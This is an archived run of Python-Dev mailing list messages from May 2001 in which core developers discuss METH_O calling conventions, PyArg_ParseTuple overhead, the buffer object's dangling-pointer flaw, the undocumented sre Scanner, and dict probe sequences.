broken... Will attempt to make sense of it. Interesting that Marc Andre
seemed to get a somewhat similar slowdown between 1.52 and 2.0.

-- 
Mark Favas  -   m.favas at per.dem.csiro.au
CSIRO, Private Bag No 5, Wembley, Western Australia 6913, AUSTRALIA


From mal at lemburg.com  Sat May 26 11:54:12 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sat, 26 May 2001 11:54:12 +0200
Subject: [Python-Dev] Special-casing "O"
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de>
Message-ID: <3B0F7D44.1A12CE0F@lemburg.com>

"Martin v. Loewis" wrote:
> 
> > I was thinking of using pointer indirection for this:
> >
> >       foo(PyObject *self, int *i)
> >
> > If i is given as argument, *i is set to the value, otherwise
> > i is set to NULL.
> 
> That is a good idea; I'll try to update my patch to more calling
> conventions.

This morning another idea popped up which could help us with
handling generic callings schemes:

	How about making *all* parameters pointers ?!

The calling mechanism would then just have to deal with an
changing number of parameters and not with different types
(this is how PyArg_ParseTuple() works too if I remember correctly).

We could easily provide calling schemes for 1 - n arguments
that way and the types of these arguments would be defined
by the parser string just like before.

Examples:

	foo(PyObject *self, PyObject *obj, int *i)
	bar(PyObject *self, int *i, int *j, char *txt, int *len)

To call these, the calling mechanism would have to cast these
to:

	foo(void *, void *, void *)
	bar(void *, void *, void *, void *, void *)

Wouldn't this work ?

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From paulp at ActiveState.com  Sat May 26 17:02:08 2001
From: paulp at ActiveState.com (Paul Prescod)
Date: Sat, 26 May 2001 08:02:08 -0700
Subject: [Python-Dev] Scanner
Message-ID: <3B0FC570.17707787@ActiveState.com>

What ever happened to the sre Scanner? It seemed like a good idea but it
was not documented and it doesn't work for me. Is it just a case of
nobody got around to the documentation or have we decided against it?

Here's the code that doesn't work for me:

from sre import Scanner

scanner = Scanner([
    (r"[a-zA-Z_]\w*", None),
    (r"\d+\.\d*", None),
    (r"\d+", None),
    (r"=|\+|-|\*|/", None),
    (r"\s+", None),
    ])

tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar")

Traceback (most recent call last):
  File "junk.py", line 11, in ?
    tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar")
  File "c:\program files\python21\lib\sre.py", line 254, in scan
    action = self.lexicon[m.lastindex][1]
TypeError: sequence index must be integer

m.lastindex is None
-- 
Take a recipe. Leave a recipe.  
Python Cookbook!  http://www.ActiveState.com/pythoncookbook


From mal at lemburg.com  Sat May 26 17:47:47 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sat, 26 May 2001 17:47:47 +0200
Subject: [Python-Dev] strop vs. string
References: <LNBBLJKPBEHFEDALKOLCEEJEKEAA.tim.one@home.com>
Message-ID: <3B0FD023.C4588919@lemburg.com>

Tim Peters wrote:
> 
> The buffer object has been neglected for years:  is that because it's in
> prime shape, or because nobody cares about it enough to maintain it?  "The
> bug" has been known for years without any action taken to address it; the
> docs give up in spots and nobody addresses that either (like "The current
> policy seems to state that these characters may be multi-byte characters" --
> well, yes or no?); the builtin buffer() function isn't called anywhere in
> the std test suite; the file object still has an undocumented readinto()
> method that just confuses people who bump into it; and it's so obscure in
> daily life that it appears Guido didn't even think of it when adding
> iterators for the other sequence types.
> 
> I expect that answers my question <wink>.  Is someone (Greg? MAL?) going to
> champion it now?  That would be cool.

I believe that nobody really likes the buffer interface enough to
let the world know about it, except maybe Greg ;-)

Even the idea of replacing the usage of strings as data buffers
with buffer object didn't get very far; common habits are simply
hard to break.

> About combining strop and buffers and strings, don't forget unicodeobject.c:
> that's got oodles of basically duplicate code too.  /F suggested dealing
> with the minor differences via maintaining one code file that gets compiled
> multiple times w/ appropriate #defines.

Hmm, that only saves us a few kB in source, but certainly not
in the object files. 

The better idea would be making the types subclass from a generic 
abstract string object -- I just don't know how this will be 
possible with Guido's type patches. We'll just have to wait, 
I guess.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From tim.one at home.com  Sat May 26 23:15:11 2001
From: tim.one at home.com (Tim Peters)
Date: Sat, 26 May 2001 17:15:11 -0400
Subject: [Python-Dev] Scanner
In-Reply-To: <3B0FC570.17707787@ActiveState.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEKJKEAA.tim.one@home.com>

[Paul Prescod]
> What ever happened to the sre Scanner? It seemed like a good idea
> but it was not documented

I previously urged /F to document, and Python-Dev to accept, the .lastindex
and .lastgroup match object extensions, but to date <wink> got no response.
Whether to adopt the Scanner class too is fuzzier, since AFAICT almost
nobody has figured out how to use it.

> and it doesn't work for me.

This isn't a code problem, it's a failure to reverse-engineer the
undocumeted API <wink>.

> Is it just a case of nobody got around to the documentation or have
> we decided against it?

WRT Scanner, partly the former, nothing of the latter, mostly that there's
been no discussion of the API at all.

WRT lastindex and lastgroup, I think purely the former.

> Here's the code that doesn't work for me:
>
> from sre import Scanner
>
> scanner = Scanner([
>     (r"[a-zA-Z_]\w*", None),
>     (r"\d+\.\d*", None),
>     (r"\d+", None),
>     (r"=|\+|-|\*|/", None),
>     (r"\s+", None),
>     ])

1. Every tokenization regexp must contain exactly one capturing group.
   The lack above is the source of your later TypeError.  Unclear to
   me whether that was the intent, or ust the way the code happens to
   work today.

2. When an action is None, the substring matched by the pattern will
   be thrown away.  You need to supply non-None actions if you want
   anything to show up in the token list.

> tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar")
>
> Traceback (most recent call last):
>   File "junk.py", line 11, in ?
>     tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar")
>   File "c:\program files\python21\lib\sre.py", line 254, in scan
>     action = self.lexicon[m.lastindex][1]
> TypeError: sequence index must be integer
>
> m.lastindex is None

Here's a working rewrite:

from sre import Scanner

def retrieve(scanner, group):
    return group

scanner = Scanner([
    (r"([a-zA-Z_]\w*)", retrieve),
    (r"(\d+\.\d*)", retrieve),
    (r"(\d+)", retrieve),
    (r"(=|\+|-|\*|/)", retrieve),
    (r"(\s+)", None),  # ignore whitespace
    ])

tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar")
print tokens, `tail`

That prints

['sum', '=', '3', '*', 'foo', '+', '312.50', '+', 'bar'] ''


In return for that, how about *you* supply a works-on-Windows rewrite of
test_urllib2.py?  You know more about that than anyone, and the test has
been failing for weeks.


From MarkH at ActiveState.com  Sun May 27 04:39:43 2001
From: MarkH at ActiveState.com (Mark Hammond)
Date: Sun, 27 May 2001 12:39:43 +1000
Subject: [Python-Dev] strop vs. string
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEJEKEAA.tim.one@home.com>
Message-ID: <LCEPIIGDJPKCOIHOBJEPKEBIDOAA.MarkH@ActiveState.com>

[Tim]
> The buffer object has been neglected for years:  is that because it's in
> prime shape, or because nobody cares about it enough to maintain it?

My take is a little different.  I think people could be convinced to care
about it, and indeed I do.  However, it has one fatal flaw, and no one seems
to know what to do about it.

The problem is the one best demonstrated with the array module - if you get
a pointer to the buffer interface for an array object, but the array then
resizes itself, the buffer pointer dangles.

There have been a few attempts over time to raise the buffer profile, but
this design flaw leaves people scratching their head - it is hard to press
for adoption of a feature that has a known crash hiding away.

However, addressing this problem is difficult.  Guido appears unconvinced
that buffer objects and interfaces are that worthwhile.  It appears no one
else knows how to proceed in the face of this ambivalence - that describes
my take even if no one elses.

The-buffer-is-dead,-long-live-the-buffer ly,

Mark.


From tim.one at home.com  Sun May 27 08:34:53 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 27 May 2001 02:34:53 -0400
Subject: [Python-Dev] Next dict crusade
Message-ID: <LNBBLJKPBEHFEDALKOLCKELEKEAA.tim.one@home.com>

I'm still trying to work off the backlog of ignored dict ideas.  Way back
here:

    http://mail.python.org/pipermail/python-dev/2000-December/011085.html

Christian Tismer suggested using polynomial division instead of
multiplication for generating the probe sequence, as a way to get all the
bits of the hash code into play.  The desirability of doing that is
illustrated by, e.g., this program:

def f(keys):
    from time import clock

    d = {}

    s = clock()
    for k in keys:
        d[k] = k
    f = clock()
    print "build time %.3f" % (f-s)

    s = clock()
    for k in keys:
        assert d.has_key(k)
    f = clock()
    print "search time %.3f" % (f-s)

# Excellent performance.
keys = range(20000)
for i in range(5):
    f(keys)

# Terrible performance; > 500x slower.
keys = [i << 16 for i in range(20000)]
for i in range(5):
    f(keys)

Christian had a very clever (cheap and effective) solution:

    Old algortithm (multiplication):
        shift the index left by 1
        if index > mask:
            xor the index with the generator polynomial

    New algorithm (division):
       if low bit of index set:
           xor the index with the generator polynomial
       shift the index right by 1

where "index" should really read "increment", and unlike today we do not
mask off any of the bits of the initial increment (and that's what lets
*all* the bits of the hash code come into play; there's no point to doing
this otherwise).

I've since discovered that it's got a fatal rare flaw:  the new algorithm
can generate a 0 increment, while the old algorithm cannot.

Example:  poly is 131 and hash is 145.  Because we don't mask off any bits
in computing the initial increment, the initial increment is computed as

    incr = hash ^ (hash >> 3) ==
           145 ^ (145 >> 3) ==
           145 ^ 18 ==
           131 ==
           poly

So if we don't hit on the first probe, the new

       if low bit of index set:
           xor the index with the generator polynomial
       shift the index right by 1

business sets incr to 0, and the result is an infinite loop (0 is a fixed
point).  I hate to add another branch to this.  As is, the existing branch
in both the old and new ways is of the worst possible kind:  it's taken half
the time, with a pseudo-random distribution.  So there's not a
branch-prediction gimmick on earth it won't fool.

Note that there's no reasonable way to identify "bad values" for incr before
the loop starts, either -- there's really no way to tell whether incr mod
poly is 0 without a loop to do division steps until incr < poly (if incr <
poly and incr != 0, incr can never become 0, so there's no more need to test
after reaching that point).  Such a "pre loop" would cost more than the
existing loop in most cases, as we usually get out of the existing loop
today on its first iteration.

But in that case, what am I worried about <wink>?

time-for-a-checkin-ly y'rs  - tim


From martin at loewis.home.cs.tu-berlin.de  Sun May 27 11:01:14 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sun, 27 May 2001 11:01:14 +0200
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <3B0F7D44.1A12CE0F@lemburg.com> (mal@lemburg.com)
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> <3B0F7D44.1A12CE0F@lemburg.com>
Message-ID: <200105270901.f4R91E601159@mira.informatik.hu-berlin.de>

> To call these, the calling mechanism would have to cast these
> to:
> 
> 	foo(void *, void *, void *)
> 	bar(void *, void *, void *, void *, void *)
> 
> Wouldn't this work ?

I think it would work, but I doubt it would save much compared to the
existing approach. The main point of this patch is to improve
efficiency, and (according to Jeremy's analysis), most of the time for
calling a function is spend in PyArg_ParseTuple. So if we replace it
with another interface that also relies on parsing a string, I doubt
we'll improve efficiency.

IOW, I won't implement that approach. If you do, I'd be curious to
hear the results, of course.

Regards,
Martin

P.S. There would be still cases where PyArg_ParseTuple is needed,
e.g. for "O!".


From mal at lemburg.com  Sun May 27 12:26:27 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sun, 27 May 2001 12:26:27 +0200
Subject: [Python-Dev] Special-casing "O"
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> <3B0F7D44.1A12CE0F@lemburg.com> <200105270901.f4R91E601159@mira.informatik.hu-berlin.de>
Message-ID: <3B10D653.4D81E280@lemburg.com>

"Martin v. Loewis" wrote:
> 
> > To call these, the calling mechanism would have to cast these
> > to:
> >
> >       foo(void *, void *, void *)
> >       bar(void *, void *, void *, void *, void *)
> >
> > Wouldn't this work ?
> 
> I think it would work, but I doubt it would save much compared to the
> existing approach. The main point of this patch is to improve
> efficiency, and (according to Jeremy's analysis), most of the time for
> calling a function is spend in PyArg_ParseTuple. So if we replace it
> with another interface that also relies on parsing a string, I doubt
> we'll improve efficiency.

That's the point: we are not replacing PyArg_ParseTuple()
with another parsing mechanism, we are only using PyArg_ParseTuple()
as fallback solution for parser strings for which we don't
provide a special case implementation.

The idea is to simply do a strcmp() (*) for a few common
combinations (like e.g. "O" and "OO") and then provide the
same special case handling like you do with e.g. METH_O.
The result would be almost the same w/r to performance
and code reduction as with your approach. The only addition
would be using strcmp() instead of a switch statement.

The advantage of this approach is that while you can still
provide special case handling of common parser strings, you
can also provide generic APIs for most other parser strings
by reverting to PyArg_ParseTuple() for these.

> IOW, I won't implement that approach. If you do, I'd be curious to
> hear the results, of course.

I'll see what I can do...

> P.S. There would be still cases where PyArg_ParseTuple is needed,
> e.g. for "O!".

True... can't win 'em all ;-)

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Sun May 27 12:30:48 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sun, 27 May 2001 12:30:48 +0200
Subject: [Python-Dev] strop vs. string
References: <LCEPIIGDJPKCOIHOBJEPKEBIDOAA.MarkH@ActiveState.com>
Message-ID: <3B10D758.3741AC2F@lemburg.com>

Mark Hammond wrote:
> 
> [Tim]
> > The buffer object has been neglected for years:  is that because it's in
> > prime shape, or because nobody cares about it enough to maintain it?
> 
> My take is a little different.  I think people could be convinced to care
> about it, and indeed I do.  However, it has one fatal flaw, and no one seems
> to know what to do about it.
> 
> The problem is the one best demonstrated with the array module - if you get
> a pointer to the buffer interface for an array object, but the array then
> resizes itself, the buffer pointer dangles.

I guess there are three ways to "solve" this:

a) mutable types don't implement the getreadbuf interface

b) the getreadbuf interface is complemented with a callback
   interface, so the the buffer object can be notified of
   the change

c) calling getreadbuf on a mutable object causes this object
   to become immutable

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From jeremy at digicool.com  Sun May 27 20:51:26 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Sun, 27 May 2001 14:51:26 -0400 (EDT)
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <200105270901.f4R91E601159@mira.informatik.hu-berlin.de>
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de>
	<3B0E1E2C.4BC121B5@lemburg.com>
	<200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de>
	<3B0ED0C7.F1A665EA@lemburg.com>
	<200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de>
	<3B0F7D44.1A12CE0F@lemburg.com>
	<200105270901.f4R91E601159@mira.informatik.hu-berlin.de>
Message-ID: <15121.19630.329909.482775@slothrop.digicool.com>

>>>>> "MvL" == Martin v Loewis <martin at loewis.home.cs.tu-berlin.de> writes:

  MvL> to the existing approach. The main point of this patch is to
  MvL> improve efficiency, and (according to Jeremy's analysis), most
  MvL> of the time for calling a function is spend in
  MvL> PyArg_ParseTuple.

I'd like to qualify this a bit.  What I reported earlier is that the
BuiltinFuntionCall microbenchmark in pybench spends 30% of its time in
PyArg_ParseTuple().  This strikes me as excessive, because it's a
static property of the code.  (One could imagine writing a Python
script that parsed the "O!|is#" format strings and generated
efficient, specialized C code for that format.)

If we benchmark other programs, particularly those that do more work
in the builtins, the relative cost of the argument processing will be
lower.

Jeremy


From jeremy at digicool.com  Sun May 27 20:55:36 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Sun, 27 May 2001 14:55:36 -0400 (EDT)
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEJHKEAA.tim.one@home.com>
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de>
	<LNBBLJKPBEHFEDALKOLCGEJHKEAA.tim.one@home.com>
Message-ID: <15121.19880.775931.946049@slothrop.digicool.com>

>>>>> "TP" == Tim Peters <tim.one at home.com> writes:

  TP> Do METH_O, convert every "O" function to use it, declare
  TP> victory, and enjoy the weekend <wink>.

  TP> 1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code-
  TP>     size-ly y'rs - tim

How is METH_O different than METH_OLDARGS?  

The old-style argument passing is definitely the most efficient for
functions of a zero or one arguments.  There's special-case code in
ceval to support it these cases -- fast_cfunction() -- primarily
because in these cases the function can be invoked by using arguments
directly from the Python stack instead of copying them to a tuple
first.

Jeremy


From tim.one at home.com  Sun May 27 22:37:43 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 27 May 2001 16:37:43 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <15121.19880.775931.946049@slothrop.digicool.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEMIKEAA.tim.one@home.com>

[Jeremy]
> How is METH_O different than METH_OLDARGS?

I have no idea:  can you explain it?  The #define's for these symbols are
uncommented, and it's a mystery to me what they're *supposed* to mean.

> The old-style argument passing is definitely the most efficient for
> functions of a zero or one arguments.  There's special-case code in
> ceval to support it these cases -- fast_cfunction() -- primarily
> because in these cases the function can be invoked by using arguments
> directly from the Python stack instead of copying them to a tuple
> first.

OK, I'm looking in bltinmodule.c, at builtin_len.  It starts like so:

static PyObject *
builtin_len(PyObject *self, PyObject *args)
{
	PyObject *v;
	long res;

	if (!PyArg_ParseTuple(args, "O:len", &v))
		return NULL;

So it's clearly expecting a tuple.  But its entry in the builtin_methods[]
table is:

	{"len",		builtin_len, 1, len_doc},

That is, it says nothing about the calling convention.  Since C fills in a 0
for missing values, and methodobject.c has

/* Flag passed to newmethodobject */
#define METH_OLDARGS  0x0000
#define METH_VARARGS  0x0001
#define METH_KEYWORDS 0x0002

then doesn't the stuct for builtin_len implicitly specify METH_OLDARGS?  But
if that's true, and fast_cfunction() does not create a tuple in this case,
how is that builtin_len gets a tuple?

Something doesn't add up here.  Or does it?  There's no *reference* to
METH_OLDARGS anywhere in the code base other than its definition and its use
in method tables, so whatever code *keys* off it must be assuming a
hardcoded 0 value for it -- or indeed nothing keys off it at all.

I expect this line in ceval.c is doing the dirty assumption:

			    } else if (flags == 0) {

and should be testing against METH_OLDARGS instead.

But I see that builtin_len is falling into the METH_VARARGS case despite
that it wasn't declared that way and that it sure looks like METH_OLDARGS
(0) is the default.  Confusing!  Fix it <wink>.


From tim.one at home.com  Sun May 27 22:46:29 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 27 May 2001 16:46:29 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEMIKEAA.tim.one@home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEMIKEAA.tim.one@home.com>

[Tim, thrashing]
> ...
> So it's clearly expecting a tuple.  But its entry in the builtin_methods[]
> table is:
>
> 	{"len",		builtin_len, 1, len_doc},
>
> That is, it says nothing about the calling convention.

Oops, it does, using a hardcoded 1 instead of the METH_VARARGS #define.  So
that explains that.

Next question:  why isn't builtin_len using METH_OLDARGS instead?  Is there
some advantage to using METH_VARARGS in this case?  This gets back to what
these #defines are intended to *mean*, and I still haven't figured that out.


From mwh at python.net  Sun May 27 23:32:48 2001
From: mwh at python.net (Michael Hudson)
Date: Sun, 27 May 2001 22:32:48 +0100 (BST)
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEMIKEAA.tim.one@home.com>
Message-ID: <Pine.LNX.4.30.0105272229200.5251-100000@localhost.localdomain>

On Sun, 27 May 2001, Tim Peters wrote:

> Next question:  why isn't builtin_len using METH_OLDARGS instead?  Is
> there some advantage to using METH_VARARGS in this case?

So you can't do

>>> len(1,2)
2

a la list.append, socket.connect pre 2.0?  (or was it 1.6?)

My imprssion is that generally METH_VARARGS is saner than METH_OLDARGS
(ie. more consistent).  It seems the proposed METH_O is basically
METH_OLDARGS + the restriction that there is in fact only one argument, so
we save a tuple allocation over METH_VARARGS, but get argument count
checking over METH_OLDARGS.

Cheers,
M.


From tim.one at home.com  Mon May 28 00:49:38 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 27 May 2001 18:49:38 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <Pine.LNX.4.30.0105272229200.5251-100000@localhost.localdomain>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEMOKEAA.tim.one@home.com>

[Tim]
> Next question:  why isn't builtin_len using METH_OLDARGS instead?  Is
> there some advantage to using METH_VARARGS in this case?

[Michael Hudson]
> So you can't do
>
> >>> len(1,2)
> 2
>
> a la list.append, socket.connect pre 2.0?  (or was it 1.6?)

If I didn't know better, I'd suspect Python's internal calling conventions
at the start didn't perfectly anticipate all future developements.  Among
other things, looks like it's impossible for a METH_OLDARGS function to
distinguish between being called with more than one argument and being
called with a single tuple argument.

> My imprssion is that generally METH_VARARGS is saner than METH_OLDARGS
> (ie. more consistent).

Yes, METH_OLDARGS does appear to, well, suck.

> It seems the proposed METH_O is basically METH_OLDARGS + the
> restriction that there is in fact only one argument, so we save
> a tuple allocation over METH_VARARGS,

Also, and more importantly, save the PyArg_ParseTuple call on the receiving
end.

> but get argument count checking over METH_OLDARGS.

Which is worth getting.  I'm back to where I started here:

Do METH_O, convert every "O" function to use it, declare victory, and enjoy
the weekend.

1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code-
    size-ly y'rs  - tim


PS:  But today I'll add another:  add at least one comment to the code --
this stuff is a bitch to reverse-engineer.


From thomas at xs4all.net  Mon May 28 00:50:58 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Mon, 28 May 2001 00:50:58 +0200
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <Pine.LNX.4.30.0105272229200.5251-100000@localhost.localdomain>; from mwh@python.net on Sun, May 27, 2001 at 10:32:48PM +0100
References: <LNBBLJKPBEHFEDALKOLCGEMIKEAA.tim.one@home.com> <Pine.LNX.4.30.0105272229200.5251-100000@localhost.localdomain>
Message-ID: <20010528005058.H690@xs4all.nl>

On Sun, May 27, 2001 at 10:32:48PM +0100, Michael Hudson wrote:
> On Sun, 27 May 2001, Tim Peters wrote:

> > Next question:  why isn't builtin_len using METH_OLDARGS instead?  Is
> > there some advantage to using METH_VARARGS in this case?

> So you can't do

> >>> len(1,2)
> 2

> a la list.append, socket.connect pre 2.0?  (or was it 1.6?)

And don't forget the method-specific errormessage by passing ':len' in the
format string. Of course, this can easily be (and probably should) done by
passing another argument to whatever parses arguments in METH_O, rather than
invoking string parsing magic every call.

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From thomas at xs4all.net  Mon May 28 00:58:30 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Mon, 28 May 2001 00:58:30 +0200
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <LNBBLJKPBEHFEDALKOLCOEMOKEAA.tim.one@home.com>; from tim.one@home.com on Sun, May 27, 2001 at 06:49:38PM -0400
References: <Pine.LNX.4.30.0105272229200.5251-100000@localhost.localdomain> <LNBBLJKPBEHFEDALKOLCOEMOKEAA.tim.one@home.com>
Message-ID: <20010528005830.I690@xs4all.nl>

On Sun, May 27, 2001 at 06:49:38PM -0400, Tim Peters wrote:

> 1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code-
>     size-ly y'rs  - tim

And recycle a quote a day ;)

> PS:  But today I'll add another:  add at least one comment to the code --
> this stuff is a bitch to reverse-engineer.

But not just any comment, please! The Pine sourcecode is riddled with calls
to 'mm_critical(stream)', and each call I've seen so far is nicely commented
with the utterly useless comment '/* go critical */'.

I'd-gladly-trade-in-every-mm_critical-comment-for-one-comment-to-describe-
 -what-Pine-actually-tries-to-do-ly y'rs,

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From martin at loewis.home.cs.tu-berlin.de  Mon May 28 00:45:53 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 28 May 2001 00:45:53 +0200
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <15121.19630.329909.482775@slothrop.digicool.com> (message from
	Jeremy Hylton on Sun, 27 May 2001 14:51:26 -0400 (EDT))
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de>
	<3B0E1E2C.4BC121B5@lemburg.com>
	<200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de>
	<3B0ED0C7.F1A665EA@lemburg.com>
	<200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de>
	<3B0F7D44.1A12CE0F@lemburg.com>
	<200105270901.f4R91E601159@mira.informatik.hu-berlin.de> <15121.19630.329909.482775@slothrop.digicool.com>
Message-ID: <200105272245.f4RMjru01021@mira.informatik.hu-berlin.de>

> I'd like to qualify this a bit.  What I reported earlier is that the
> BuiltinFuntionCall microbenchmark in pybench spends 30% of its time in
> PyArg_ParseTuple().  This strikes me as excessive, because it's a
> static property of the code.  (One could imagine writing a Python
> script that parsed the "O!|is#" format strings and generated
> efficient, specialized C code for that format.)
> 
> If we benchmark other programs, particularly those that do more work
> in the builtins, the relative cost of the argument processing will be
> lower.

Certainly: If the work inside the function increases, the overhead of
calling it will be less visible. What the benchmark shows, however,
and what my patch addresses, is that the time for *calling* a function
is primarily spent in PyArg_ParseTuple (and not in, say, building
argument tuples, putting parameters on the stack, fetching function
addresses, building method objects, and so on).

Regards,
Martin


From tim.one at home.com  Mon May 28 01:17:27 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 27 May 2001 19:17:27 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <20010528005058.H690@xs4all.nl>
Message-ID: <LNBBLJKPBEHFEDALKOLCIENAKEAA.tim.one@home.com>

[Thomas Wouters]
> And don't forget the method-specific errormessage by passing ':len' in
> the format string. Of course, this can easily be (and probably should)
> done by passing another argument to whatever parses arguments in
> METH_O, rather than invoking string parsing magic every call.

Martin's patch automatically inserts the name of the function in the
TypeError it raises when a METH_O call doesn't get exactly one argument, or
gets a (one or more) keyword argument.

Stick to METH_O and it's a clear win, even in this respect:  there's no info
in an explicit ":len" he's not already deducing, and almost all instances of
"O:name" formats today are exactly the same this way:

if (!PyArg_ParseTuple(args, "O:abs", &v))
if (!PyArg_ParseTuple(args, "O:callable", &v))
if (!PyArg_ParseTuple(args, "O:id", &v))
if (!PyArg_ParseTuple(args, "O:hash", &v))
if (!PyArg_ParseTuple(args, "O:hex", &v))
if (!PyArg_ParseTuple(args, "O:float", &v))
if (!PyArg_ParseTuple(args, "O:len", &v))
if (!PyArg_ParseTuple(args, "O:list", &v))
else if (!PyArg_ParseTuple(args, "O:min/max", &v))
if (!PyArg_ParseTuple(args, "O:oct", &v))
if (!PyArg_ParseTuple(args, "O:ord", &obj))
if (!PyArg_ParseTuple(args, "O:reload", &v))
if (!PyArg_ParseTuple(args, "O:repr", &v))
if (!PyArg_ParseTuple(args, "O:str", &v))
if (!PyArg_ParseTuple(args, "O:tuple", &v))
if (!PyArg_ParseTuple(args, "O:type", &v))

Those are all the ones in bltinmodule.c, and nearly all of them are called
extremely frequently in *some* programs.  The only oddball is min/max, but
then it supports more than one call-list format and so isn't a METH_O
candidate anyway.  Indeed, Martin's patch gives a *better* message than we
get for some mistakes today:

>>> len(val=2)
Yraceback (most recent call last):
 File "<stdin>", line 1, in ?
TypeError: len() takes exactly 1 argument (0 given)
>>>

Martin's would say

    TypeError: len takes no keyword arguments

in this case.  He should add "()" after the function name.  He should also
throw away the half of the patch complicating and slowing METH_O to get some
theoretical speedup in other cases:  make the one-arg builtins fly just as
fast as humanly possible.


From greg at cosc.canterbury.ac.nz  Mon May 28 02:23:55 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Mon, 28 May 2001 12:23:55 +1200 (NZST)
Subject: [Python-Dev] strop vs. string
In-Reply-To: <LCEPIIGDJPKCOIHOBJEPKEBIDOAA.MarkH@ActiveState.com>
Message-ID: <200105280023.MAA00996@s454.cosc.canterbury.ac.nz>

> However, it has one fatal flaw, and no one seems
> to know what to do about it.

I think it would be safe if:

1) it kept a reference to the underlying object, and

2) it re-fetched the pointer and length info each time it was
   needed, using the underlying object's buffer interface.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From greg at cosc.canterbury.ac.nz  Mon May 28 02:28:41 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Mon, 28 May 2001 12:28:41 +1200 (NZST)
Subject: [Python-Dev] strop vs. string
In-Reply-To: <20010525132752.B5402@lyra.org>
Message-ID: <200105280028.MAA01000@s454.cosc.canterbury.ac.nz>

Greg Stein <gstein at lyra.org>

> "badly" is overstating the problem. It caches a pointer when it shouldn't.
> This doesn't work well

But "doesn't work well" means "can crash the interpreter".
I don't think "badly" is an overstatement here...

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


